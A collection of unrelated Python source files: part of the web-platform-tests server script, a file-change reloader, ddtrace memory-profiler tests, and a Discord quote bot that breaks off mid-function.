return '<script src="%s"></script>' % attribute
return None
class WorkersHandler(HtmlWrapperHandler):
global_type = b"dedicatedworker"
path_replace = [(".any.worker.html", ".any.js", ".any.worker.js"),
(".worker.html", ".worker.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script>
fetch_tests_from_worker(new Worker("%(path)s%(query)s"));
</script>
"""
class WindowHandler(HtmlWrapperHandler):
path_replace = [(".window.html", ".window.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
%(script)s
<div id=log></div>
<script src="%(path)s"></script>
"""
class AnyHtmlHandler(HtmlWrapperHandler):
global_type = b"window"
path_replace = [(".any.html", ".any.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script>
self.GLOBAL = {
isWindow: function() { return true; },
isWorker: function() { return false; },
};
</script>
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
%(script)s
<div id=log></div>
<script src="%(path)s"></script>
"""
class SharedWorkersHandler(HtmlWrapperHandler):
global_type = b"sharedworker"
path_replace = [(".any.sharedworker.html", ".any.js", ".any.worker.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script>
fetch_tests_from_worker(new SharedWorker("%(path)s%(query)s"));
</script>
"""
class ServiceWorkersHandler(HtmlWrapperHandler):
global_type = b"serviceworker"
path_replace = [(".any.serviceworker.html", ".any.js", ".any.worker.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script>
(async function() {
const scope = 'does/not/exist';
let reg = await navigator.serviceWorker.getRegistration(scope);
if (reg) await reg.unregister();
reg = await navigator.serviceWorker.register("%(path)s%(query)s", {scope});
fetch_tests_from_worker(reg.installing);
})();
</script>
"""
class AnyWorkerHandler(WrapperHandler):
headers = [('Content-Type', 'text/javascript')]
path_replace = [(".any.worker.js", ".any.js")]
wrapper = """%(meta)s
self.GLOBAL = {
isWindow: function() { return false; },
isWorker: function() { return true; },
};
importScripts("/resources/testharness.js");
%(script)s
importScripts("%(path)s");
done();
"""
def _meta_replacement(self, key, value):
return None
def _script_replacement(self, key, value):
if key == b"script":
attribute = value.decode('utf-8').replace("\\", "\\\\").replace('"', '\\"')
return 'importScripts("%s")' % attribute
if key == b"title":
value = value.decode('utf-8').replace("\\", "\\\\").replace('"', '\\"')
return 'self.META_TITLE = "%s";' % value
return None
rewrites = [("GET", "/resources/WebIDLParser.js", "/resources/webidl2/lib/webidl2.js")]
class RoutesBuilder(object):
def __init__(self):
self.forbidden_override = [("GET", "/tools/runner/*", handlers.file_handler),
("POST", "/tools/runner/update_manifest.py",
handlers.python_script_handler)]
self.forbidden = [("*", "/_certs/*", handlers.ErrorHandler(404)),
("*", "/tools/*", handlers.ErrorHandler(404)),
("*", "{spec}/tools/*", handlers.ErrorHandler(404))]
self.extra = []
self.mountpoint_routes = OrderedDict()
self.add_mount_point("/", None)
def get_routes(self):
routes = self.forbidden_override + self.forbidden + self.extra
# Using reversed here means that mount points that are added later
# get higher priority. This makes sense since / is typically added
# first.
for item in reversed(self.mountpoint_routes.values()):
routes.extend(item)
return routes
def add_handler(self, method, route, handler):
self.extra.append((str(method), str(route), handler))
def add_static(self, path, format_args, content_type, route, headers=None):
if headers is None:
headers = {}
handler = handlers.StaticHandler(path, format_args, content_type, **headers)
self.add_handler("GET", str(route), handler)
def add_mount_point(self, url_base, path):
url_base = "/%s/" % url_base.strip("/") if url_base != "/" else "/"
self.mountpoint_routes[url_base] = []
routes = [
("GET", "*.worker.html", WorkersHandler),
("GET", "*.window.html", WindowHandler),
("GET", "*.any.html", AnyHtmlHandler),
("GET", "*.any.sharedworker.html", SharedWorkersHandler),
("GET", "*.any.serviceworker.html", ServiceWorkersHandler),
("GET", "*.any.worker.js", AnyWorkerHandler),
("GET", "*.asis", handlers.AsIsHandler),
("GET", "/.well-known/origin-policy", handlers.PythonScriptHandler),
("*", "*.py", handlers.PythonScriptHandler),
("GET", "*", handlers.FileHandler)
]
for (method, suffix, handler_cls) in routes:
self.mountpoint_routes[url_base].append(
(method,
"%s%s" % (url_base if url_base != "/" else "", suffix),
handler_cls(base_path=path, url_base=url_base)))
def add_file_mount_point(self, file_url, base_path):
assert file_url.startswith("/")
url_base = file_url[0:file_url.rfind("/") + 1]
self.mountpoint_routes[file_url] = [("GET", file_url, handlers.FileHandler(base_path=base_path, url_base=url_base))]
def build_routes(aliases):
builder = RoutesBuilder()
for alias in aliases:
url = alias["url-path"]
directory = alias["local-dir"]
if not url.startswith("/") or len(directory) == 0:
logger.error("\"url-path\" value must start with '/'.")
continue
if url.endswith("/"):
builder.add_mount_point(url, directory)
else:
builder.add_file_mount_point(url, directory)
return builder.get_routes()
class ServerProc(object):
def __init__(self, scheme=None):
self.proc = None
self.daemon = None
self.stop = Event()
self.scheme = scheme
def start(self, init_func, host, port, paths, routes, bind_address, config, **kwargs):
self.proc = Process(target=self.create_daemon,
args=(init_func, host, port, paths, routes, bind_address,
config),
name='%s on port %s' % (self.scheme, port),
kwargs=kwargs)
self.proc.daemon = True
self.proc.start()
def create_daemon(self, init_func, host, port, paths, routes, bind_address,
config, **kwargs):
try:
self.daemon = init_func(host, port, paths, routes, bind_address, config, **kwargs)
except socket.error:
print("Socket error on port %s" % port, file=sys.stderr)
raise
except Exception:
print(traceback.format_exc(), file=sys.stderr)
raise
if self.daemon:
try:
self.daemon.start(block=False)
try:
self.stop.wait()
except KeyboardInterrupt:
pass
except Exception:
print(traceback.format_exc(), file=sys.stderr)
raise
def wait(self):
self.stop.set()
self.proc.join()
def kill(self):
self.stop.set()
self.proc.terminate()
self.proc.join()
def is_alive(self):
return self.proc.is_alive()
def check_subdomains(config):
paths = config.paths
bind_address = config.bind_address
aliases = config.aliases
host = config.server_host
port = get_port()
logger.debug("Going to use port %d to check subdomains" % port)
wrapper = ServerProc()
wrapper.start(start_http_server, host, port, paths, build_routes(aliases),
bind_address, config)
url = "http://{}:{}/".format(host, port)
connected = False
for i in range(10):
try:
urllib.request.urlopen(url)
connected = True
break
except urllib.error.URLError:
time.sleep(1)
if not connected:
logger.critical("Failed to connect to test server "
"on {}. {}".format(url, EDIT_HOSTS_HELP))
sys.exit(1)
for domain in config.domains_set:
if domain == host:
continue
try:
urllib.request.urlopen("http://%s:%d/" % (domain, port))
except Exception:
logger.critical("Failed probing domain {}. {}".format(domain, EDIT_HOSTS_HELP))
sys.exit(1)
wrapper.wait()
def make_hosts_file(config, host):
rv = []
for domain in config.domains_set:
rv.append("%s\t%s\n" % (host, domain))
# Windows interprets the IP address 0.0.0.0 as non-existent, making it an
# appropriate alias for non-existent hosts. However, UNIX-like systems
# interpret the same address to mean any IP address, which is inappropriate
# for this context. These systems do not reserve any value for this
# purpose, so the unavailability of the domains must be taken for granted.
#
# https://github.com/web-platform-tests/wpt/issues/10560
if platform.uname()[0] == "Windows":
for not_domain in config.not_domains_set:
rv.append("0.0.0.0\t%s\n" % not_domain)
return "".join(rv)
def start_servers(host, ports, paths, routes, bind_address, config, **kwargs):
servers = defaultdict(list)
for scheme, ports in ports.items():
assert len(ports) == {"http": 2}.get(scheme, 1)
# If trying to start HTTP/2.0 server, check compatibility
if scheme == 'h2' and not http2_compatible():
logger.error('Cannot start HTTP/2.0 server as the environment is not compatible. ' +
'Requires Python 2.7.10+ (< 3.0) and OpenSSL 1.0.2+')
continue
for port in ports:
if port is None:
continue
init_func = {"http": start_http_server,
"https": start_https_server,
"h2": start_http2_server,
"ws": start_ws_server,
"wss": start_wss_server}[scheme]
server_proc = ServerProc(scheme=scheme)
server_proc.start(init_func, host, port, paths, routes, bind_address,
config, **kwargs)
servers[scheme].append((port, server_proc))
return servers
def start_http_server(host, port, paths, routes, bind_address, config, **kwargs):
return wptserve.WebTestHttpd(host=host,
port=port,
doc_root=paths["doc_root"],
routes=routes,
rewrites=rewrites,
bind_address=bind_address,
config=config,
use_ssl=False,
key_file=None,
certificate=None,
latency=kwargs.get("latency"))
def start_https_server(host, port, paths, routes, bind_address, config, **kwargs):
return wptserve.WebTestHttpd(host=host,
port=port,
doc_root=paths["doc_root"],
routes=routes,
rewrites=rewrites,
bind_address=bind_address,
config=config,
use_ssl=True,
key_file=config.ssl_config["key_path"],
certificate=config.ssl_config["cert_path"],
encrypt_after_connect=config.ssl_config["encrypt_after_connect"],
latency=kwargs.get("latency"))
def start_http2_server(host, port, paths, routes, bind_address, config, **kwargs):
return wptserve.WebTestHttpd(host=host,
port=port,
handler_cls=wptserve.Http2WebTestRequestHandler,
doc_root=paths["doc_root"],
routes=routes,
rewrites=rewrites,
bind_address=bind_address,
config=config,
use_ssl=True,
key_file=config.ssl_config["key_path"],
certificate=config.ssl_config["cert_path"],
encrypt_after_connect=config.ssl_config["encrypt_after_connect"],
latency=kwargs.get("latency"),
http2=True)
class WebSocketDaemon(object):
def __init__(self, host, port, doc_root, handlers_root, bind_address, ssl_config):
self.host = host
cmd_args = ["-p", port,
"-d", doc_root,
"-w", handlers_root]
if ssl_config is not None:
# This is usually done through pywebsocket.main, however we're
# working around that to get the server instance and manually
# setup the wss server.
if pywebsocket._import_ssl():
tls_module = pywebsocket._TLS_BY_STANDARD_MODULE
elif pywebsocket._import_pyopenssl():
tls_module = pywebsocket._TLS_BY_PYOPENSSL
else:
print("No SSL module available")
sys.exit(1)
cmd_args += ["--tls",
"--private-key", ssl_config["key_path"],
"--certificate", ssl_config["cert_path"],
"--tls-module", tls_module]
if (bind_address):
cmd_args = ["-H", host] + cmd_args
opts, args = pywebsocket._parse_args_and_config(cmd_args)
opts.cgi_directories = []
opts.is_executable_method = None
self.server = pywebsocket.WebSocketServer(opts)
ports = [item[0].getsockname()[1] for item in self.server._sockets]
assert all(item == ports[0] for item in ports)
self.port = ports[0]
self.started = False
self.server_thread = None
def start(self, block=False):
self.started = True
if block:
self.server.serve_forever()
else:
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.setDaemon(True) # don't hang on exit
self.server_thread.start()
def stop(self):
"""
Stops the server.
If the server is not running, this method has no effect.
"""
if self.started:
try:
self.server.shutdown()
self.server.server_close()
self.server_thread.join()
self.server_thread = None
except AttributeError:
pass
self.started = False
self.server = None
def release_mozlog_lock():
try:
from mozlog.structuredlog import StructuredLogger
try:
StructuredLogger._lock.release()
except threading.ThreadError:
pass
except ImportError:
pass
def start_ws_server(host, port, paths, routes, bind_address, config, **kwargs):
# Ensure that when we start this in a new process we have the global lock
# in the logging module unlocked
reload_module(logging)
release_mozlog_lock()
return WebSocketDaemon(host,
str(port),
repo_root,
config.paths["ws_doc_root"],
bind_address,
ssl_config=None)
def start_wss_server(host, port, paths, routes, bind_address, config, **kwargs):
# Ensure that when we start this in a new process we have the global lock
# in the logging module unlocked
reload_module(logging)
release_mozlog_lock()
return WebSocketDaemon(host,
str(port),
repo_root,
config.paths["ws_doc_root"],
bind_address,
config.ssl_config)
def start(config, routes, **kwargs):
host = config["server_host"]
ports = config.ports
paths = config.paths
bind_address = config["bind_address"]
logger.debug("Using ports: %r" % ports)
servers = start_servers(host, ports, paths, routes, bind_address, config, **kwargs)
return servers
def iter_procs(servers):
for servers in servers.values():
for port, server in servers:
yield server.proc
def build_config(override_path=None, **kwargs):
rv = ConfigBuilder()
enable_http2 = kwargs.get("h2")
if enable_http2 is None:
enable_http2 = True
if enable_http2:
rv._default["ports"]["h2"] = [9000]
if override_path and os.path.exists(override_path):
with open(override_path) as f:
override_obj = json.load(f)
rv.update(override_obj)
if kwargs.get("config_path"):
other_path = os.path.abspath(os.path.expanduser(kwargs.get("config_path")))
if os.path.exists(other_path):
with open(other_path) as f:
override_obj = json.load(f)
rv.update(override_obj)
else:
raise ValueError("Config path %s does not exist" % other_path)
overriding_path_args = [("doc_root", "Document root"),
("ws_doc_root", "WebSockets document root")]
for key, title in overriding_path_args:
value = kwargs.get(key)
if value is None:
continue
value = os.path.abspath(os.path.expanduser(value))
if not os.path.exists(value):
raise ValueError("%s path %s does not exist" % (title, value))
setattr(rv, key, value)
return rv
def _make_subdomains_product(s, depth=2):
return {u".".join(x) for x in chain(*(product(s, repeat=i) for i in range(1, depth+1)))}
def _make_origin_policy_subdomains(limit):
return {u"op%d" % x for x in range(1,limit+1)}
_subdomains = {u"www",
u"www1",
u"www2",
u"天気の良い日",
u"élève"}
_not_subdomains = {u"nonexistent"}
_subdomains = _make_subdomains_product(_subdomains)
# Origin policy subdomains need to not be reused by any other tests, since origin policies have
# origin-wide impacts like installing a CSP or Feature Policy that could interfere with features
# under test.
# See https://github.com/web-platform-tests/rfcs/pull/44.
_subdomains |= _make_origin_policy_subdomains(99)
_not_subdomains = _make_subdomains_product(_not_subdomains)
class ConfigBuilder(config.ConfigBuilder):
"""serve config
This subclasses wptserve.config.ConfigBuilder to add serve config options.
"""
_default = {
"browser_host": "web-platform.test",
"alternate_hosts": {
"alt": "not-web-platform.test"
},
"doc_root": repo_root,
"ws_doc_root": os.path.join(repo_root, "websockets", "handlers"),
"server_host": None,
"ports": {
"http": [8000, "auto"],
"https": [8443],
"ws": ["auto"],
"wss": ["auto"],
},
"check_subdomains": True,
"log_level": "debug",
"bind_address": True,
"ssl": {
"type": "pregenerated",
"encrypt_after_connect": False,
"openssl": {
"openssl_binary": "openssl",
"base_path": "_certs",
"password": "web-platform-tests",
"force_regenerate": False,
"duration": 30,
"base_conf_path": None
},
"pregenerated": {
"host_key_path": os.path.join(repo_root, "tools", "certs", "web-platform.test.key"),
"host_cert_path": os.path.join(repo_root, "tools", "certs", "web-platform.test.pem")
},
"none": {}
},
"aliases": []
}
computed_properties = ["ws_doc_root"] + config.ConfigBuilder.computed_properties
def __init__(self, *args, **kwargs):
if "subdomains" not in kwargs:
kwargs["subdomains"] = _subdomains
if "not_subdomains" not in kwargs:
kwargs["not_subdomains"] = _not_subdomains
super(ConfigBuilder, self).__init__(
*args,
**kwargs
)
with self as c:
browser_host = c.get("browser_host")
alternate_host = c.get("alternate_hosts", {}).get("alt")
if not domains_are_distinct(browser_host, alternate_host):
raise ValueError(
"Alternate host must be distinct from browser host"
)
def _get_ws_doc_root(self, data):
if data["ws_doc_root"] is not None:
return data["ws_doc_root"]
else:
return os.path.join(data["doc_root"], "websockets", "handlers")
def ws_doc_root(self, v):
self._ws_doc_root = v
ws_doc_root = property(None, ws_doc_root)
def _get_paths(self, data):
rv = super(ConfigBuilder, self)._get_paths(data)
rv["ws_doc_root"] = data["ws_doc_root"]
return rv
def get_parser():
parser = argparse.ArgumentParser()
parser.add_argument("--latency", type=int,
help="Artificial latency to add before sending http responses, in ms")
parser.add_argument("--config", action="store", dest="config_path",
help="Path to external config file")
parser.add_argument("--doc_root", action="store", dest="doc_root",
help="Path to document root. Overrides config.")
parser.add_argument("--ws_doc_root", action="store", dest="ws_doc_root",
help="Path to WebSockets document root. Overrides config.")
parser.add_argument("--alias_file", action="store", dest="alias_file",
help="File with entries for aliases/multiple doc roots. In form of `/ALIAS_NAME/, DOC_ROOT\\n`")
parser.add_argument("--h2", action="store_true", dest="h2", default=None,
help=argparse.SUPPRESS)
parser.add_argument("--no-h2", action="store_false", dest="h2", default=None,
help="Disable the HTTP/2.0 server")
return parser
def run(**kwargs):
received_signal = threading.Event()
with build_config(os.path.join(repo_root, "config.json"),
**kwargs) as config:
global logger
logger = config.logger
set_logger(logger)
# Configure the root logger to cover third-party libraries.
logging.getLogger().setLevel(config.log_level)
def handle_signal(signum, frame):
logger.debug("Received signal %s. Shutting down.", signum)
received_signal.set()
bind_address = config["bind_address"]
if kwargs.get("alias_file"):
with open(kwargs["alias_file"], 'r') as alias_file:
for line in alias_file:
alias, doc_root = [x.strip() for x in line.split(',')]
config["aliases"].append({
'url-path': alias,
'local-dir': doc_root,
})
if config["check_subdomains"]:
check_subdomains(config)
stash_address = None
if bind_address:
stash_address = (config.server_host, get_port(""))
logger.debug("Going to use port %d for stash" % stash_address[1])
with stash.StashServer(stash_address, authkey=str(uuid.uuid4())):
servers = start(config, build_routes(config["aliases"]), **kwargs)
signal.signal(signal.SIGTERM, handle_signal)
signal.signal(signal.SIGINT, handle_signal)
while all(item.is_alive() for item in iter_procs(servers)) and not received_signal.is_set():
for item in iter_procs(servers):
item.join(1)
exited = [item for item in iter_procs(servers) if not item.is_alive()]
subject = "subprocess" if len(exited) == 1 else "subprocesses"
logger.info("%s %s exited:" % (len(exited), subject))
for item in iter_procs(servers):
logger.info("Status of %s:\t%s" % (item.name, "running" if item.is_alive() else "not running"))
def main():
kwargs = vars(get_parser().parse_args())
return run(**kwargs)
|
statreload.py
|
import multiprocessing
import os
import signal
import time
from pathlib import Path
HANDLED_SIGNALS = (
signal.SIGINT, # Unix signal 2. Sent by Ctrl+C.
signal.SIGTERM, # Unix signal 15. Sent by `kill <pid>`.
)
class StatReload:
def __init__(self, config):
self.config = config
self.should_exit = False
self.reload_count = 0
self.mtimes = {}
def handle_exit(self, sig, frame):
self.should_exit = True
def run(self, target, *args, **kwargs):
pid = os.getpid()
logger = self.config.logger_instance
logger.info("Started reloader process [{}]".format(pid))
for sig in HANDLED_SIGNALS:
signal.signal(sig, self.handle_exit)
spawn = multiprocessing.get_context("spawn")
process = spawn.Process(target=target, args=args, kwargs=kwargs)
process.start()
while process.is_alive() and not self.should_exit:
time.sleep(0.3)
if self.should_restart():
self.clear()
os.kill(process.pid, signal.SIGTERM)
process.join()
process = spawn.Process(target=target, args=args, kwargs=kwargs)
process.start()
self.reload_count += 1
logger.info("Stopping reloader process [{}]".format(pid))
def clear(self):
self.mtimes = {}
def should_restart(self):
for filename in self.iter_py_files():
try:
mtime = os.stat(filename).st_mtime
except OSError as exc: # pragma: nocover
continue
old_time = self.mtimes.get(filename)
if old_time is None:
self.mtimes[filename] = mtime
continue
elif mtime > old_time:
display_path = os.path.normpath(filename)
if Path.cwd() in Path(filename).parents:
display_path = os.path.normpath(os.path.relpath(filename))
message = "Detected file change in '%s'. Reloading..."
self.config.logger_instance.warning(message, display_path)
return True
return False
def iter_py_files(self):
for reload_dir in self.config.reload_dirs:
for subdir, dirs, files in os.walk(reload_dir):
for file in files:
filepath = subdir + os.sep + file
if filepath.endswith(".py"):
yield filepath
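# Typical use (hypothetical sketch; the target callable and its arguments are assumptions):
#   StatReload(config).run(server_entry_point, sockets=[...])
# The parent process spawns the target in a child process and restarts it whenever the
# mtime of a watched .py file changes.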
|
test_memalloc.py
|
# -*- encoding: utf-8 -*-
import gc
import os
import threading
import pytest
try:
from ddtrace.profiling.collector import _memalloc
except ImportError:
pytestmark = pytest.mark.skip("_memalloc not available")
from ddtrace.profiling import _nogevent
from ddtrace.profiling import _periodic
from ddtrace.profiling import recorder
from ddtrace.profiling.collector import memalloc
def test_start_twice():
_memalloc.start(64, 1000, 512)
with pytest.raises(RuntimeError):
_memalloc.start(64, 1000, 512)
_memalloc.stop()
def test_start_wrong_arg():
with pytest.raises(TypeError, match="function takes exactly 3 arguments \\(1 given\\)"):
_memalloc.start(2)
with pytest.raises(ValueError, match="the number of frames must be in range \\[1; 65535\\]"):
_memalloc.start(429496, 1000, 1)
with pytest.raises(ValueError, match="the number of frames must be in range \\[1; 65535\\]"):
_memalloc.start(-1, 1000, 1)
with pytest.raises(ValueError, match="the number of events must be in range \\[1; 65535\\]"):
_memalloc.start(64, -1, 1)
with pytest.raises(ValueError, match="the heap sample size must be in range \\[0; 4294967295\\]"):
_memalloc.start(64, 1000, -1)
with pytest.raises(ValueError, match="the heap sample size must be in range \\[0; 4294967295\\]"):
_memalloc.start(64, 1000, 345678909876)
def test_start_stop():
_memalloc.start(1, 1, 1)
_memalloc.stop()
# This is used by tests and must be equal to the line number where object() is called in _allocate_1k 😉
_ALLOC_LINE_NUMBER = 57
def _allocate_1k():
return [object() for _ in range(1000)]
def _pre_allocate_1k():
return _allocate_1k()
def test_iter_events():
max_nframe = 32
_memalloc.start(max_nframe, 10000, 512 * 1024)
_allocate_1k()
events, count, alloc_count = _memalloc.iter_events()
_memalloc.stop()
assert count >= 1000
# Watch out: if we dropped samples the test will likely fail
object_count = 0
for (stack, nframe, thread_id), size in events:
assert 0 < len(stack) <= max_nframe
assert nframe >= len(stack)
last_call = stack[0]
assert size >= 1 # size depends on the object size
if last_call[2] == "<listcomp>" and last_call[1] == _ALLOC_LINE_NUMBER:
assert thread_id == _nogevent.main_thread_id
assert last_call[0] == __file__
assert stack[1][0] == __file__
assert stack[1][1] == _ALLOC_LINE_NUMBER
assert stack[1][2] == "_allocate_1k"
object_count += 1
assert object_count >= 1000
def test_iter_events_dropped():
max_nframe = 32
_memalloc.start(max_nframe, 100, 512 * 1024)
_allocate_1k()
events, count, alloc_count = _memalloc.iter_events()
_memalloc.stop()
assert count == 100
assert alloc_count >= 1000
def test_iter_events_not_started():
with pytest.raises(RuntimeError, match="the memalloc module was not started"):
_memalloc.iter_events()
@pytest.mark.skipif(os.getenv("DD_PROFILE_TEST_GEVENT", False), reason="Test not compatible with gevent")
def test_iter_events_multi_thread():
max_nframe = 32
t = threading.Thread(target=_allocate_1k)
_memalloc.start(max_nframe, 10000, 512 * 1024)
_allocate_1k()
t.start()
t.join()
events, count, alloc_count = _memalloc.iter_events()
_memalloc.stop()
assert count >= 1000
# Watch out: if we dropped samples the test will likely fail
count_object = 0
count_thread = 0
for (stack, nframe, thread_id), size in events:
assert 0 < len(stack) <= max_nframe
assert nframe >= len(stack)
last_call = stack[0]
assert size >= 1 # size depends on the object size
if last_call[2] == "<listcomp>" and last_call[1] == _ALLOC_LINE_NUMBER:
assert last_call[0] == __file__
if thread_id == _nogevent.main_thread_id:
count_object += 1
assert stack[1][0] == __file__
assert stack[1][1] == _ALLOC_LINE_NUMBER
assert stack[1][2] == "_allocate_1k"
elif thread_id == t.ident:
count_thread += 1
assert stack[2][0] == threading.__file__
assert stack[2][1] > 0
assert stack[2][2] == "run"
assert count_object >= 1000
assert count_thread >= 1000
def test_memory_collector():
r = recorder.Recorder()
mc = memalloc.MemoryCollector(r)
with mc:
_allocate_1k()
# Make sure we collect at least once
mc.periodic()
count_object = 0
for event in r.events[memalloc.MemoryAllocSampleEvent]:
assert 0 < len(event.frames) <= mc.max_nframe
assert event.nframes >= len(event.frames)
assert 0 < event.capture_pct <= 100
last_call = event.frames[0]
assert event.size > 0
if last_call[2] == "<listcomp>" and last_call[1] == _ALLOC_LINE_NUMBER:
assert event.thread_id == _nogevent.main_thread_id
assert event.thread_name == "MainThread"
count_object += 1
assert event.frames[2][0] == __file__
assert event.frames[2][1] == 150
assert event.frames[2][2] == "test_memory_collector"
assert count_object > 0
@pytest.mark.parametrize(
"ignore_profiler",
(True, False),
)
def test_memory_collector_ignore_profiler(ignore_profiler):
r = recorder.Recorder()
mc = memalloc.MemoryCollector(r, ignore_profiler=ignore_profiler)
with mc:
object()
# Make sure we collect at least once
mc.periodic()
ok = False
for event in r.events[memalloc.MemoryAllocSampleEvent]:
for frame in event.frames:
if ignore_profiler:
assert frame[0] != _periodic.__file__
elif frame[0] == _periodic.__file__:
ok = True
break
if not ignore_profiler:
assert ok
def test_heap():
max_nframe = 32
_memalloc.start(max_nframe, 10, 8 * 1024)
x = _allocate_1k()
# Check that at least one sample comes from the main thread
thread_found = False
for (stack, nframe, thread_id), size in _memalloc.heap():
assert 0 < len(stack) <= max_nframe
assert size > 0
if thread_id == _nogevent.main_thread_id:
thread_found = True
assert isinstance(thread_id, int)
if (
stack[0][0] == __file__
and stack[0][1] == _ALLOC_LINE_NUMBER
and stack[0][2] == "<listcomp>"
and stack[1][0] == __file__
and stack[1][1] == _ALLOC_LINE_NUMBER
and stack[1][2] == "_allocate_1k"
and stack[2][0] == __file__
and stack[2][2] == "test_heap"
):
break
else:
pytest.fail("No trace of allocation in heap")
assert thread_found, "Main thread not found"
y = _pre_allocate_1k()
for (stack, nframe, thread_id), size in _memalloc.heap():
assert 0 < len(stack) <= max_nframe
assert size > 0
assert isinstance(thread_id, int)
if (
stack[0][0] == __file__
and stack[0][1] == _ALLOC_LINE_NUMBER
and stack[0][2] == "<listcomp>"
and stack[1][0] == __file__
and stack[1][1] == _ALLOC_LINE_NUMBER
and stack[1][2] == "_allocate_1k"
and stack[2][0] == __file__
and stack[2][2] == "_pre_allocate_1k"
):
break
else:
pytest.fail("No trace of allocation in heap")
del x
gc.collect()
for (stack, nframe, thread_id), size in _memalloc.heap():
assert 0 < len(stack) <= max_nframe
assert size > 0
assert isinstance(thread_id, int)
if (
stack[0][0] == __file__
and stack[0][1] == _ALLOC_LINE_NUMBER
and stack[0][2] == "<listcomp>"
and stack[1][0] == __file__
and stack[1][1] == _ALLOC_LINE_NUMBER
and stack[1][2] == "_allocate_1k"
and stack[2][0] == __file__
and stack[2][2] == "test_heap"
):
pytest.fail("Allocated memory still in heap")
del y
gc.collect()
for (stack, nframe, thread_id), size in _memalloc.heap():
assert 0 < len(stack) <= max_nframe
assert size > 0
assert isinstance(thread_id, int)
if (
stack[0][0] == __file__
and stack[0][1] == _ALLOC_LINE_NUMBER
and stack[0][2] == "<listcomp>"
and stack[1][0] == __file__
and stack[1][1] == _ALLOC_LINE_NUMBER
and stack[1][2] == "_allocate_1k"
and stack[2][0] == __file__
and stack[2][2] == "_pre_allocate_1k"
):
pytest.fail("Allocated memory still in heap")
_memalloc.stop()
def test_heap_collector():
heap_sample_size = 4 * 1024
r = recorder.Recorder()
mc = memalloc.MemoryCollector(r, heap_sample_size=heap_sample_size)
with mc:
keep_me = _allocate_1k()
events = mc.snapshot()
assert len(events) == 1
assert len(events[0]) >= 1
del keep_me
for event in events[0]:
assert 0 < len(event.frames) <= mc.max_nframe
assert event.nframes >= len(event.frames)
assert event.sample_size == heap_sample_size
assert len(event.frames) >= 1
assert event.size > 0
assert event.thread_id > 0
assert isinstance(event.thread_name, str)
def test_heap_stress():
# This should run for a few seconds, and is enough to spot potential segfaults.
_memalloc.start(64, 64, 1024)
x = []
for _ in range(20):
for _ in range(1000):
x.append(object())
_memalloc.heap()
del x[:100]
_memalloc.stop()
@pytest.mark.parametrize("heap_sample_size", (0, 512 * 1024, 1024 * 1024, 2048 * 1024, 4096 * 1024))
def test_memalloc_speed(benchmark, heap_sample_size):
if heap_sample_size:
r = recorder.Recorder()
with memalloc.MemoryCollector(r, heap_sample_size=heap_sample_size):
benchmark(_allocate_1k)
else:
benchmark(_allocate_1k)
|
main.py
|
import discord
from itertools import cycle
from discord.ext import tasks, commands
from datetime import date
from flask import Flask
from threading import Thread
app = Flask('')
today = date.today()
# Quote Library
quote_library = {}
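# Quotes are kept in memory only, keyed by person name, e.g. (hypothetical contents):
#   {"Alice": ["2021-01-01 - Hello there"], "Bob": []}
# so all quotes are lost whenever the bot restarts.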
@app.route('/')
def main():
return "Your Bot Is Ready"
def run():
app.run(host="0.0.0.0", port=8000)
def keep_alive():
server = Thread(target=run)
server.start()
client = commands.Bot(command_prefix='.')
status = cycle(['Status 1', 'Status 2', 'Status 3'])
@client.event
async def on_ready():
change_status.start()
print("Quote Bot is Ready!")
@tasks.loop(seconds=10)
async def change_status():
await client.change_presence(activity=discord.Game(next(status)))
# List of Quotable People
def getlist(dictionary):
return list(dictionary.keys())
# Ping Command to check bot latency
@client.command(aliases=["PING", "Ping", "p", "P"])
async def ping(ctx):
await ctx.send(f"Ping: {round(client.latency * 1000)}ms")
# Help Command to get list of Commands
@client.command(aliases=["Guide", "GUIDE", "G", "g"])
async def guide(ctx):
await ctx.send(f"Here are all the available commands:\n"
f".ping - Checks the latency of the Quote Bot\n"
f".guide - Provides a list of all commands\n"
f".add name - Adds a new quotable person\n"
f".delete name - Deletes a quotable person\n"
f".q message ~ name - Adds a quote to the person's list of quotes\n"
f".d name - Displays all of the person's quotes\n"
f".r index ~ name - Removes a specific quote from a person's list\n"
f".a name - Displays the total number of quotes a person has\n"
f".c name - Clears all quotes from the person's list")
# Add Command to Add a New Quotable Person
@client.command(aliases=["Add", "ADD"])
async def add(ctx, *, name):
if quote_library.get(name) is None:
temp = {name: list()}
quote_library.update(temp)
await ctx.send(f"{name} has been added as a quotable person!")
else:
await ctx.send("The person you are trying to add already exists")
# Del Command to Delete a Quotable Person
@client.command(aliases=["Delete", "DELETE"])
async def delete(ctx, *, name):
if quote_library.get(name) is None:
await ctx.send("The person you are trying to remove doesn't exist")
else:
del quote_library[name]
await ctx.send(f"{name} has been removed from the list of quotable people")
# Quote Command to add a Quote to a Quotable Person
@client.command(aliases=["Quote", "QUOTE", "q", "Q"])
async def quote(ctx, *, message):
messagelist = [x.strip() for x in message.split('~')]
if quote_library.get(messagelist[-1]) is None:
await ctx.send("The person you are trying to quote is not yet a quotable person")
else:
quote_library.get(messagelist[-1]).append(f"{today} - {messagelist[0]}")
await ctx.send("Quoted!")
# Display Command to display all quotes of a particular person
@client.command(aliases=["Display", "DISPLAY", "d", "D"])
async def display(ctx, *, name):
if quote_library.get(name) is None:
await ctx.send("The person you have searched for is not a quotable person\n"
"Please check the spelling of the name and ensure it matches with one of the following:\n"
+ (str(getlist(quote_library))) +
f"\nOtherwise, please add this person to the list of quotable people using .add")
elif len(quote_library.get(name)) == 0:
await ctx.send(f"{name} does not have any quotes yet! You can change that by using "
f".quote")
else:
for elem in quote_library.get(name):
await ctx.send(f"{(1 + (quote_library.get(name).index(elem)))}. {elem}")
# Amount Command that displays the number of times a person has been quoted
@client.command(aliases=["Amount", "AMOUNT", "a", "A"])
async def amount(ctx, *, name):
